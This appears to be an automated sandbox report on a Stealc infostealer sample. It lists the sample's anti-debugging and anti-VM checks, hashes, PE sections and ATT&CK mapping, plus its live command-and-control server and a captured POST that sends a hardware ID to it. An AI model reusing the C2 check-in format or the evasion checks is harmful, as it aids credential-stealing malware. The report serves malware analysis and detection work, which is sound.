Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00E53EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E4F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F68A FindFirstFileA, 0_2_00E4F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E4BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E4DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E41160 GetSystemInfo,ExitProcess, 0_2_00E41160
Source: file.exe, file.exe, 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2208867559.0000000001D13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWw
Source: file.exe, 00000000.00000002.2208867559.0000000001CE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2208867559.0000000001D13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13391
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13405
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13394
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13413
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13445
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01248B89 rdtsc 0_2_01248B89
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E445C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00E445C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E59860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59750 mov eax, dword ptr fs:[00000030h] 0_2_00E59750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00E578E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00E59600
Source: file.exe, file.exe, 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00E57B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E57980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00E57980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E57850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00E57850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E57A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00E57A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (per-technique counts as shown in the report are given in parentheses):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (651) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (4) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
windowsupdatebg.s.llnwi.net | 87.248.204.0 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpK | file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/U | file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpo | file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpU | file.exe, 00000000.00000002.2208867559.0000000001CE2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpz | file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1529339
                                Start date and time:2024-10-08 21:41:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 16s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 20
                                • Number of non-executed functions: 89
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 20.190.159.23, 20.190.159.75, 40.126.31.67, 20.190.159.0, 20.190.159.64, 40.126.31.73, 20.190.159.68, 40.126.31.71
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
fp2e7a.wpc.phicdn.net | SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | malicious | LummaC, Vidar | 192.229.221.95
 | https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw== | malicious | HTMLPhisher | 192.229.221.95
 | https://dc.dolshgdh.site/?Ufrj=g5 | malicious | Unknown | 192.229.221.95
 | https://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4 | malicious | Unknown | 192.229.221.95
 | 15PylGQjzK.exe | malicious | LummaC, Vidar | 192.229.221.95
 | https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg | malicious | Unknown | 192.229.221.95
 | https://dvj-305jg-9h.car-financeclaim.co.uk/4-604-9vh-9h35g-h3.html#info@tintolaw.co.za | malicious | HTMLPhisher | 192.229.221.95
 | http://lifecodigestion.com | malicious | Unknown | 192.229.221.95
 | file.exe | malicious | LummaC, Vidar | 192.229.221.95
 | https://simpleinvoices.io/invoices/gvexd57Lej7 | malicious | Unknown | 192.229.221.95
windowsupdatebg.s.llnwi.net | https://simpleinvoices.io/invoices/gvexd57Lej7 | malicious | Unknown | 41.63.96.0
 | Oilmax Systems Updated.xls | malicious | Unknown | 87.248.205.0
 | http://pay.christinagstewart.com/ | malicious | Unknown | 87.248.205.0
 | http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/ | malicious | Unknown | 87.248.204.0
 | Bn7LPdQA1s.exe | malicious | LummaC, Vidar | 178.79.208.1
 | https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ== | malicious | Unknown | 87.248.204.0
 | https://dsdhie.org/dsjhem | malicious | Unknown | 87.248.205.0
 | 8ID0109FLT24PO92CD-R.pdf | malicious | HTMLPhisher | 87.248.205.0
 | https://fenster-mark-gmbhsharefile.btn-ebikes.com/ | malicious | Unknown | 87.248.205.0
 | http://46.27.141.62 | malicious | Unknown | 87.248.205.0
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.949006571183067
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'853'440 bytes
                                MD5:02978bae9becb20a4ba6f439f8eb552f
                                SHA1:728da10f79bc011ea19ca78aa8aae0b9946f9f4b
                                SHA256:669036c06a6fd0494eb7db1eac48d0a477a47d7fff54dcc29fdbf7876ef39900
                                SHA512:5f507e3e5c0741199acf4fb28626e643ba671ff7b36093ede4eada9869c53c1f8d80682d06e8a34fe8550b9ddc657111f73ffad1b5f0cf3ef00bc83a6c91c6f7
                                SSDEEP:49152:m4wsF5Eod/ll4PfCcvJevtnOLfjfbBCSsU:9wsF5Eox0Ol0/BCSl
                                TLSH:578533245F32F01EC0A82BB5C61B927339757FA478B44EBA198E07457ADCC1C58DFA68
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xaa4000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F39A53AA93Ah
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | a06c30b68028b5920eca54c7d2fe980c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a6000 | 0x200 | f60c423fb70ed43a20ea348cb4a35d51 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gklmxpts | 0x504000 | 0x19f000 | 0x19e600 | 28dc9add79b3b4ddb9df28abc7797287 | False | 0.9951693297511313 | data | 7.955274531054208 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
csoyoskk | 0x6a3000 | 0x1000 | 0x400 | d3f7d98a4051476a2fb8da90897f30b5 | False | 0.8076171875 | data | 6.217901750673708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a4000 | 0x3000 | 0x2200 | 9db8f1ecdb6b177dbca642407afeeab1 | False | 0.06502757352941177 | DOS executable (COM) | 0.6394435046751349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T21:42:18.802712+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49727 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 21:42:17.547411919 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Oct 8, 2024 21:42:17.553010941 CEST | 80 | 49727 | 185.215.113.37 | 192.168.2.5
Oct 8, 2024 21:42:17.553353071 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Oct 8, 2024 21:42:17.553353071 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Oct 8, 2024 21:42:17.558753967 CEST | 80 | 49727 | 185.215.113.37 | 192.168.2.5
Oct 8, 2024 21:42:18.558069944 CEST | 80 | 49727 | 185.215.113.37 | 192.168.2.5
Oct 8, 2024 21:42:18.558212996 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Oct 8, 2024 21:42:18.563785076 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Oct 8, 2024 21:42:18.569120884 CEST | 80 | 49727 | 185.215.113.37 | 192.168.2.5
Oct 8, 2024 21:42:18.802558899 CEST | 80 | 49727 | 185.215.113.37 | 192.168.2.5
Oct 8, 2024 21:42:18.802711964 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Oct 8, 2024 21:42:21.161889076 CEST | 49727 | 80 | 192.168.2.5 | 185.215.113.37
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 21:42:09.364187002 CEST | 1.1.1.1 | 192.168.2.5 | 0x3137 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 21:42:09.364187002 CEST | 1.1.1.1 | 192.168.2.5 | 0x3137 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 21:42:10.916261911 CEST | 1.1.1.1 | 192.168.2.5 | 0x903f | No error (0) | windowsupdatebg.s.llnwi.net | | 87.248.204.0 | A (IP address) | IN (0x0001) | false
                                • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49727 | 185.215.113.37 | 80 | 6584 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 21:42:17.553353071 CEST | 89 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
Oct 8, 2024 21:42:18.558069944 CEST | 203 | IN | HTTP/1.1 200 OK
                                Date: Tue, 08 Oct 2024 19:42:18 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
Oct 8, 2024 21:42:18.563785076 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJK
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 36 42 39 38 41 36 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a
                                Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="hwid"B7C6B98A619D1524750037------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="build"doma------BGCBGCAFIIECBFIDHIJK--
Oct 8, 2024 21:42:18.802558899 CEST | 210 | IN | HTTP/1.1 200 OK
                                Date: Tue, 08 Oct 2024 19:42:18 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=



                                Target ID:0
                                Start time:15:42:14
                                Start date:08/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xe40000
                                File size:1'853'440 bytes
                                MD5 hash:02978BAE9BECB20A4BA6F439F8EB552F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
